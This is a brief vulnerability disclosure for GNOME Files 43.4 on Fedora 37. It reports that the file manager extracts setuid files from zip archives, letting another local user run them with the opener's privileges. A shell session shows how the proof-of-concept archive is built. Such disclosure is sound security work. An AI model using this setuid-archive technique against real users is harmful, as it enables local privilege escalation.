Authored by Georgi Guninski

GNOME Files version 43.4 (nautilus) on Fedora 37 will extract zip archives with setuid files for other user identifiers that can be leveraged to escalate privileges.

Affected: GNOME Files 43.4 (nautilus) on fedora 37


If an user A opens in GNOME files zip archive containing
`setuid` file F, then F will be silently extracted to
a subdirectory of CWD.

If F is accessible by hostile local user B and B executes F,
then F will be executed as from user A.

tar(1) and unzip(1) are not vulnerable to this attack.

Session for creating the ZIP.
After that just open in GNOME files.
[joro@fedora ~]$ umask
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F
[joro@fedora 2]$ zip f F ; zipinfo f
Zip file size: 155 bytes, number of entries: 1
-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F
[joro@fedora 2]$ ls -ld /tmp/2/
drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/
[joro@fedora 2]$